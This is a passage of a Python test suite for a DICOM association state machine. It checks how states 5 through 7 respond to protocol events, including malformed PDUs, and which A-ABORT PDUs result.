assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt6']
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta5 + Evt7."""
# Sta5 + Evt7 -> <ignore> -> Sta5
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt7']
def test_evt08(self):
"""Test Sta5 + Evt8."""
# Sta5 + Evt8 -> <ignore> -> Sta5
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt8']
def test_evt09(self):
"""Test Sta5 + Evt9."""
# Sta5 + Evt9 -> <ignore> -> Sta5
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None), # recv a-associate-rq
('wait', 0.2),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt9']
def test_evt10(self):
"""Test Sta5 + Evt10."""
# Sta5 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', p_data_tf),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt10', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt10']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt11(self):
"""Test Sta5 + Evt11."""
# Sta5 + Evt11 -> <ignore> -> Sta5
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt11']
def test_evt12(self):
"""Test Sta5 + Evt12."""
# Sta5 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_release_rq),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt12', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt12']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt13(self):
"""Test Sta5 + Evt13."""
# Sta5 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_release_rp),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt13', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt13']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt14(self):
"""Test Sta5 + Evt14."""
# Sta5 + Evt14 -> <ignore> -> Sta5
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt14']
def test_evt15(self):
"""Test Sta5 + Evt15."""
# Sta5 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and restart ARTIM
commands = [
('recv', None),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt15', 'AA-1'),
('Sta13', 'Evt17', 'AR-5'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta13', 'Sta1']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt15', 'Evt17']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta5 + Evt16."""
# Sta5 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: If service user initiated:
# Issue A-ABORT primitve and close transport
# Otherwise
# Issue A-P-ABORT primitive and close transport
commands = [
('recv', None),
('send', a_abort),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta1']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt16']
def test_evt17(self):
"""Test Sta5 + Evt17."""
# Sta1 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta1']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt17']
def test_evt18(self):
"""Test Sta5 + Evt18."""
# Sta5 + Evt18 -> <ignore> -> Sta5
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt18']
def test_evt19(self):
"""Test Sta5 + Evt19."""
# Sta5 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', b'\x08\x00\x00\x00\x00\x00'),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt19']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
class TestState06(TestStateBase):
"""Tests for State 06: Association established and ready for data."""
def test_evt01(self):
"""Test Sta6 + Evt1."""
# Sta6 + Evt1 -> <ignore> -> Sta6
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.3)
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta6 + Evt2."""
# Sta6 + Evt2 -> <ignore> -> Sta6
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta6 + Evt3."""
# Sta6 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.01)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt3']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta6 + Evt4."""
# Sta6 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_rj),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt4']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta6 + Evt5."""
# Sta6 + Evt5 -> <ignore> -> Sta6
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta6 + Evt6."""
# Sta6 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_rq),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt6']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta6 + Evt7."""
# Sta6 + Evt7 -> <ignore> -> Sta6
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt7']
def test_evt08(self):
"""Test Sta6 + Evt8."""
# Sta6 + Evt8 -> <ignore> -> Sta6
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt8']
def test_evt09(self):
"""Test Sta6 + Evt9."""
# Sta6 + Evt9 -> DT-1 -> Sta6
# Evt9: Receive P-DATA primitive from <local user>
# DT-1: Send P-DATA-TD PDU
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt9', 'DT-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt9']
def test_evt10(self):
"""Test Sta6 + Evt10."""
# Sta6 + Evt10 -> DT-2 -> Sta6
# Evt10: Receive P-DATA-TF PDU from <remote>
# DT-2: Send P-DATA primitive
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', p_data_tf),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt10', 'DT-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt10']
def test_evt11(self):
"""Test Sta6 + Evt11."""
# Sta6 + Evt11 -> AR-1 -> Sta7
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt11']
def test_evt12(self):
"""Test Sta6 + Evt12."""
# Sta6 + Evt12 -> AR-2 -> Sta8
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AR-2: Issue A-RELEASE (rq) primitive
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt12']
def test_evt13(self):
"""Test Sta6 + Evt13."""
# Sta6 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rp),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt13', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt13']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt14(self):
"""Test Sta6 + Evt14."""
# Sta6 + Evt14 -> <ignore> -> Sta6
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt14']
def test_evt15(self):
"""Test Sta6 + Evt15."""
# Sta6 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.abort()
time.sleep(0.1)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt15']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta6 + Evt16."""
# Sta6 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT, and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_abort),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta1']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt16']
def test_evt17(self):
"""Test Sta6 + Evt17."""
# Sta6 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta1']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt17']
def test_evt18(self):
"""Test Sta6 + Evt18."""
# Sta6 + Evt18 -> <ignore> -> Sta6
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.4),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt18']
def test_evt19(self):
"""Test Sta6 + Evt19."""
# Sta6 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', b'\x08\x00\x00\x00\x00\x00'),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt19']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
class TestState07(TestStateBase):
"""Tests for State 07: Awaiting A-RELEASE-RP PDU."""
def test_evt01(self):
"""Test Sta7 + Evt1."""
# Sta7 + Evt1 -> <ignore> -> Sta7
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_associate('request'))
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta7 + Evt2."""
# Sta7 + Evt2 -> <ignore> -> Sta7
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta7 + Evt3."""
# Sta7 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_associate_ac),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt3']
# Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta7 + Evt4."""
# Sta7 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_associate_rj),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt4', 'AA-8'),
]
